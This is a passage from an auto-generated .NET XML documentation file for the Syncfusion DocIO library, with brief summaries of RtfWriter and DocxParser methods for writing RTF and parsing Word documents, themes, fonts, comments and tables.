            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.GetLevelText(Syncfusion.DocIO.DLS.WListLevel,System.Boolean)">
            <summary>
            Gets the level text.
            </summary>
            <param name="listLevel">The list level.</param>
            <param name="isLevelNumbers"> whether numberSuffix need to be added or not based on level numbers</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildLevelFormatting(Syncfusion.DocIO.DLS.ListPatternType)">
            <summary>
            Builds the level formatting.
            </summary>
            <param name="type">The type of number.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.AppendOverrideList">
            <summary>
            Appends the override list style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildListText(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Builds the list text for paragraph.
            </summary>
            <param name="para">The para.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildListText(Syncfusion.DocIO.DLS.WListLevel,Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Builds the list text for paragraph.
            </summary>
            <param name="listLevel">The list level.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.GetLstStartVal(Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Gets the List start value.
            </summary>
            <param name="format">The list format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildLstLetterSymbol(Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Builds the List letter symbol.
            </summary>
            <param name="format">The list format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.IsChanged(System.String@)">
            <summary>
            Determines whether the specified text is changed.
            </summary>
            <param name="text">The text.</param>
            <returns>
            	<c>true</c> if the specified text is changed; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.IsComplexList(System.String)">
            <summary>
            Checks the number prefix.
            </summary>
            <param name="prefix">The number prefix.</param>
            <returns>
            	<c>true</c> if [is complex list] [the specified prefix]; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildPictWtrmarkBody(Syncfusion.DocIO.DLS.PictureWatermark)">
            <summary>
            Builds the picture watermark body.
            </summary>
            <param name="picWatermark">The pic watermark.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTextWtrmarkBody(Syncfusion.DocIO.DLS.TextWatermark)">
            <summary>
            Builds the text watermark body ( property ).
            </summary>
            <param name="textWatermark">The text watermark.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildDefWtrmarkProp">
            <summary>
            Builds the default watermark property.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTextFormField(Syncfusion.DocIO.DLS.WTextFormField)">
            <summary>
            Builds the text form field.
            </summary>
            <param name="textField">The text field.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildCheckBox(Syncfusion.DocIO.DLS.WCheckBox)">
            <summary>
            Builds the check box.
            </summary>
            <param name="checkBox">The check box.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildDropDownField(Syncfusion.DocIO.DLS.WDropDownFormField)">
            <summary>
            Builds the drop down field.
            </summary>
            <param name="dropDownField">The drop down field.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildCommentMark(Syncfusion.DocIO.DLS.WCommentMark)">
            <summary>
            Builds the comment mark.
            </summary>
            <param name="cMark">The c mark.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildComment(Syncfusion.DocIO.DLS.WComment)">
            <summary>
            Builds the comment.
            </summary>
            <param name="comment">The comment.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildComItems(Syncfusion.DocIO.DLS.WComment,System.String)">
            <summary>
            Builds the Commnet items.
            </summary>
            <param name="comment">The comment.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildColorValue(Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.Color,Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.Color,System.Int32,System.String)">
            <summary>
            Sets the color value.
            </summary>
            <param name="cFormat">The character format.</param>
            <param name="cFormatColor">Color</param>
            <param name="baseCFormat">The base character format.</param>
            <param name="baseCFormatColor">Color</param>
            <param name="optionKey">The option key.</param>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildHighlightNamedColor(System.Drawing.Color,System.String)">
            <summary>
            Builds Highlight color with name
            </summary>
            <param name="color">The color.</param>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildNamedColor(System.Drawing.Color,System.String)">
            <summary>
            Builds color with name
            </summary>
            <param name="color">The color.</param>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.CheckFootEndnote">
            <summary>
            Checks the section for footnotes/endnotes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildFieldType(Syncfusion.DocIO.FieldType)">
            <summary>
            Builds field type.
            </summary>
            <param name="type">The type.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.GetRtfShapeColor(System.Drawing.Color)">
            <summary>
            Gets the color of the RTF format shape.
            </summary>
            <param name="color">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.GetRtfPageBackgroundColor(System.Drawing.Color)">
            <summary>
            Gets the color of the RTF format shape.
            </summary>
            <param name="color">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.WriteElements(System.String)">
            <summary>
            Writes the elements.
            </summary>
            <param name="param">The param.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.GetNextFontId(System.Boolean)">
            <summary>
            Generate next font id.
            </summary>
            <param name="isBidi">if set to <c>true</c> [is bidi].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.GetNextId">
            <summary>
            Gets the next id.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.GetNextColorId">
            <summary>
            Gets the next color id.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.IsFontEntryExits(System.String,System.Boolean)">
            <summary>
            Check whether the font entries exists in the font table
            </summary>
            <param name="fontName"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.AppendFont(System.String,System.String)">
            <summary>
            Appends the font to the FonrString.
            </summary>
            <param name="fontId">The font id.</param>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildColor(System.Drawing.Color,System.String)">
            <summary>
            Appends the color to the ColorString.
            </summary>
            <param name="color">The color.</param>
            <param name="attributeStr">The attribute string.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.WriteFontName(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Writes the font names.
            </summary>
            <param name="cFormat">The character format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.WriteFontNameBidi(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Writes the font name bidi.
            </summary>
            <param name="cFormat">The character format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.HasParaEnd(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Writes the paragraph end.
            </summary>
            <param name="para">The para.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.PrepareText(System.String)">
            <summary>
            Prepares the text.
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.ReplaceUnicode(System.String)">
            <summary>
            Replace unicode characters.
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.BuildTextRangeStr(Syncfusion.DocIO.DLS.WCharacterFormat,System.String)">
            <summary>
            Builds the text range.
            </summary>
            <param name="cFormat">The character format.</param>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.WriteFieldEnd(Syncfusion.DocIO.DLS.WFieldMark)">
            <summary>
            Writes the field end.
            </summary>
            <param name="mark">The field mark.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.GetOwnerSection(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Gets the owner section.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RtfWriter.InitCellEndPos">
            <summary>
            Inits the cell end pos.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RtfWriter.ListsIds">
            <summary>
            Gets the document lists ids.
            </summary>
            <value>The lists ids.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RtfWriter.ListOverrideAr">
            <summary>
            Gets the list override array.
            </summary>
            <value>The list override ar.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RtfWriter.Styles">
            <summary>
            Gets the styles.
            </summary>
            <value>The styles.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RtfWriter.StyleNumb">
            <summary>
            Gets the style numb.
            </summary>
            <value>The style numb.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RtfWriter.ListStart">
            <summary>
            Gets the lists.
            </summary>
            <value>The lists.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RtfWriter.CommentIds">
            <summary>
            Gets the comment ids.
            </summary>
            <value>The comment ids.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RtfWriter.CurrentField">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RtfWriter.ColorTable">
            <summary>
            Gets the color table.
            </summary>
            <value>The color table.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.RtfWriter.BorderType">
            <summary>
            Row borders
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfWriter.BorderType.Right">
            <summary>
            Right border
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfWriter.BorderType.Left">
            <summary>
            Left border
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfWriter.BorderType.Top">
            <summary>
            Top border
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfWriter.BorderType.Bottom">
            <summary>
            Bottom border
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Convertors.DocxParser">
            <summary>
            Represents the parser for MS Word 2010 generated document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Read(System.String,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Reads the specified document path.
            </summary>
            <param name="documentPath">The document path.</param>
            <param name="doc">The Word document.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ReadWordML(System.String,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Reads the Word ML from filename
            </summary>
            <param name="fileName">The file name.</param>
            <param name="document">Instance of Word document.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ReadWord2003Xml(System.IO.Stream,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Read the Word 2003Xml document
            </summary>
            <param name="stream">The document stream.</param>
            <param name="document">Instance of Word document.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.OpenFlatOPC(System.IO.Stream)">
            <summary>
            Reads FlatOPC document from the stream.
            </summary>
            <param name="docStream">Stream to read data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Read(System.IO.Stream,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Reads the specified data stream.
            </summary>
            <param name="dataStream">The document stream.</param>
            <param name="doc">Instance of Word document.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ReadWordML(System.IO.Stream,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Reads the Word ML stream
            </summary>
            <param name="docStream">The document stream.</param>
            <param name="document">Instance of Word document.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.DecryptDocumentStream(System.IO.Stream,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Gets the decrypted document stream.
            </summary>
            <param name="stream">The stream.</param>
            <param name="doc">The doc.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Read(Syncfusion.DocIO.DLS.WordDocument,System.Boolean)">
            <summary>
            Reads the word document
            </summary>
            <param name="document">The Word Document</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdatePath(Syncfusion.DocIO.DLS.Package)">
            <summary>
            Update the main document path
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetPathByContentType(System.String,Syncfusion.DocIO.DLS.Package)">
            <summary>
            Get the path by its content type
            </summary>
            <param name="document">The extension.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetExtensionContentType(System.String)">
            <summary>
            Get the content type of extension
            </summary>
            <param name="document">The extension.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetFormatType(System.String)">
            <summary>
            Get Format Type based AppVersion.
            </summary>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateFormatType(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Updates the document format type.
            </summary>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDocument(Syncfusion.DocIO.DLS.Package)">
            <summary>
            Parse the document and its relations
            </summary>
            <param name="package"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ClearParsedImage(System.String,System.String)">
            <summary>
            Clears the parsed image from package.
            </summary>
            <param name="imageName">Name of the image.</param>
            <param name="containerName">Name of the container.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseThemes(System.IO.Stream)">
            <summary>
            Parse the theme xml part
            </summary>
            <param name="stream">Theme part stream</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseThemeElements(System.Xml.XmlReader)">
            <summary>
            Parse the theme elements
            </summary>
            <param name="stream">XmlReader</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFormatScheme(System.Xml.XmlReader)">
            <summary>
            Parse the Format Scheme
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseEffectStyleScheme(System.Xml.XmlReader)">
            <summary>
            Parse the Effect style Scheme
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseEffectList(System.Xml.XmlReader)">
            <summary>
            Parse the Effect style list of themes scheme
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetPropertyValue(System.String,System.String)">
            <summary>
            Gets the shape property value
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShapeProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.EffectFormat)">
            <summary>
            Parse the Shape ThreeD properties(sp3d).
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSceneProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.EffectFormat)">
            <summary>
            Parse the Scene ThreeD properties(scene3d)
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCameraSettings(System.Xml.XmlReader,Syncfusion.DocIO.DLS.EffectFormat)">
            <summary>
            Parse the camera settings
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLightRigSettings(System.Xml.XmlReader,Syncfusion.DocIO.DLS.EffectFormat)">
            <summary>
            Parse the light rig
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetLightRigDirection(System.String)">
            <summary>
            Gets the Light rig direction
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseScene3DRotation(System.Xml.XmlReader,System.String,Syncfusion.DocIO.DLS.EffectFormat)">
            <summary>
            Parse the ThreeD rotation effects
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseBackdrop(System.Xml.XmlReader,Syncfusion.DocIO.DLS.EffectFormat)">
            <summary>
            Parse the ThreeD back drops
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseEffectListItems(System.Xml.XmlReader,Syncfusion.DocIO.DLS.EffectFormat)">
            <summary>
            Parse the Effect list items
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFillStyleList(System.Xml.XmlReader,System.String)">
            <summary>
            Parse the fill style list
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseThemeColorTransform(System.Xml.XmlReader,System.String)">
            <summary>
            Parses the color transform.
            </summary>
            <param name="reader">The reader.</param>
            <param name="parentElement">The parent element.</param>
            <param name="themeColor">Color of the theme.</param>
            <param name="opacity">The opacity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFormatSchemeGradientFill(System.Xml.XmlReader,Syncfusion.DocIO.DLS.GradientFill)">
            <summary>
             Parses the theme element gradient fill of the Fill Style List.
             </summary>
             <param name="reader">The reader.</param>
             <param name="gradientFill">The gradient fill.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFormatSchemeGradientStop(System.Xml.XmlReader,Syncfusion.DocIO.DLS.GradientFill)">
            <summary>
            Parses the theme elements gradient stop.
            </summary>
            <param name="reader">The reader.</param>
            <param name="gradientFill">The gradient fill.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLineStyleScheme(System.Xml.XmlReader)">
            <summary>
            Parse the Line Style Scheme
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLineStyle(System.Xml.XmlReader,Syncfusion.DocIO.DLS.LineFormat)">
            <summary>
            Parse the Line Style
            </summary>
            <param name="stream">Theme part stream</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFontScheme(System.Xml.XmlReader)">
            <summary>
            Parse the Font Scheme
            </summary>
            <param name="stream">Theme part stream</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSchemeColor(System.Xml.XmlReader)">
            <summary>
            Parse the Scheme Color
            </summary>
            <param name="stream">Theme part stream</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBaseFontName(System.IO.Stream,System.Boolean)">
            <summary>
            Gets the name of the base font.
            </summary>
            <param name="reader">The reader.</param>
            <param name="isMajor">if it is major, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDocumentProperties(Syncfusion.DocIO.DLS.Package)">
            <summary>
            Extract the DocProperties part
            </summary>
            <param name="package">Docx package</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseVbaProject(System.IO.Stream)">
            <summary>
            Parses the vba project.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseVbaData(System.IO.Stream)">
            <summary>
            Parses the vba data.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseMacroData(System.Xml.XmlReader)">
            <summary>
            Parses the macro data.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDocEvents(System.Xml.XmlReader)">
            <summary>
            Parses the doc events.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFontTable(System.IO.Stream)">
            <summary>
            Parses the font table.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFontTable(System.Xml.XmlReader)">
            <summary>
            Parses the fonts of Word 2003 XML document.
            </summary>
            <param name="stream">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateFontTable">
            <summary>
            Update Font Table
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2003FontDetails(System.Xml.XmlReader,System.String)">
            <summary>
            Parse the Word 2003 Xml font details
            </summary>
            <param name="reader">The reader</param>
            <param name="fontName">The fontName</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFontDetails(System.Xml.XmlReader,System.String)">
            <summary>
            Parses the font details.
            </summary>
            <param name="reader">The reader.</param>
            <param name="fontName">The fontName.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBytes(System.String)">
            <summary>
            Get Bytes from string
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDocument(System.IO.Stream)">
            <summary>
            Parse the document
            </summary>
            <param name="stream">The document.xml stream</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseBody(System.Xml.XmlReader,Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Parse the document body
            </summary>
            <param name="reader">The Xml reader</param>
            <param name="entity">The entity</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.SDTContentWithSectionBreakParagraph(Syncfusion.DocIO.DLS.StructureDocumentTagBlock)">
            <summary>
            Modify the object model of StructureDocumentTagBlock whether the paragraph in the SDTContent has section break
            </summary>
            <param name="sdttagblock"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.AddParagraph(Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Add the paragraph to the corresponding textbody
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.AddPostElements(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Add the post elements to the paragraph
            </summary>
            <param name="paragraph">The paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseParagraphItems(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parse the pargraph element
            </summary>
            <param name="reader">Xml reader</param>
            <param name="paragraph">The paragraph object</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseComment(System.Xml.XmlReader)">
            <summary>
            Parses the comment.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2003Comment(System.Xml.XmlReader)">
            <summary>
            Parses the 2003 format comment.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseComments">
            <summary>
            Parse the comments part (comments.xml)
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCommentRangeStart(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parses the comment start.
            </summary>
            <param name="reader">The reader.</param>
            <param name="para">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCommentRangeEnd(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parses the comment end.
            </summary>
            <param name="reader">The reader.</param>
            <param name="para">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateCommentsStack(System.String)">
            <summary>
            Update comments stack
            </summary>
            <param name="id">The id of the specific comment</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateCommentItems(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Updates the commented items.
            </summary>
            <param name="item">The item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTable(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Parse the table
            </summary>
            <param name="reader">The XmlReader</param>
            <param name="table">The Table</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateTableCellWidth(Syncfusion.DocIO.DLS.WTable,System.Collections.Generic.Dictionary{System.String,System.Int16})">
            <summary>
            Update the table cell width if width was not specified and type was none or auto.
            </summary>
            <param name="table">The Table</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableRow(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTableRow,System.Boolean@,System.Collections.Generic.Dictionary{System.String,System.Int16})">
            <summary>
            Parse the table row
            </summary>
            <param name="reader">The Xml reader</param>
            <param name="tableRow">The table row</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseStructureDocumentTagCell(System.Xml.XmlReader,Syncfusion.DocIO.DLS.StructureDocumentTagCell,Syncfusion.DocIO.DLS.WTableRow,System.Boolean@,System.Collections.Generic.Dictionary{System.String,System.Int16})">
            <summary>
            Parse Structure document tag cell
            </summary>
            <param name="reader"></param>
            <param name="sdtCell"></param>
            <param name="tableRow"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSDTCellContent(System.Xml.XmlReader,Syncfusion.DocIO.DLS.StructureDocumentTagCell,Syncfusion.DocIO.DLS.WTableRow,System.Boolean@,System.Collections.Generic.Dictionary{System.String,System.Int16})">
            <summary>
            Parse structure document tag cell content
            </summary>
            <param name="reader"></param>
            <param name="sdtCell"></param>
            <param name="tableRow"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSDTRowContent(System.Xml.XmlReader,Syncfusion.DocIO.DLS.StructureDocumentTagRow,Syncfusion.DocIO.DLS.WTable,System.Boolean@,System.Boolean@,System.Collections.Generic.Dictionary{System.String,System.Int16})">
            <summary>
            Parses Structure document tag row content
            </summary>
            <param name="reader">Reader</param>
            <param name="sdtRow">StructureDocumentTagRow</param>
            <param name="table">WTable</param>
            <param name="isSDTcontentFirst"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableCell(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTableCell,System.Collections.Generic.Dictionary{System.String,System.Int16})">
            <summary>
            Parse the table cell
            </summary>
            <param name="reader">The xml reader</param>
            <param name="tableCell">The table cell</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCellProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTableCell,System.Collections.Generic.Dictionary{System.String,System.Int16})">
            <summary>
            Parse the table cell properties (CellFormat)
            </summary>
            <param name="reader">The Xml reader</param>
            <param name="tableCell">The table cell</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsRowsFirstCellWidthZero(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            return true if row's first cell width was not defined and type was none or auto.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsCellsWidthTypesNoneOrAuto(Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            return true if cells width types are none or auto and width 0.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseChangeCellFormat(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTableCell,System.Collections.Generic.Dictionary{System.String,System.Int16})">
            <summary>
            Parses the change cell format
            </summary>
            <param name="reader"></param>
            <param name="tableCell"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCellShading(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Parse the cell shadings
            </summary>
            <param name="reader">The xmlreader</param>
            <param name="cell">The table cell</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCellVerticalMerge(System.Xml.XmlReader,Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Parse the cell vertical Merge
            </summary>
            <param name="reader"></param>
            <param name="cellFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCellHorizontalMerge(System.Xml.XmlReader,Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
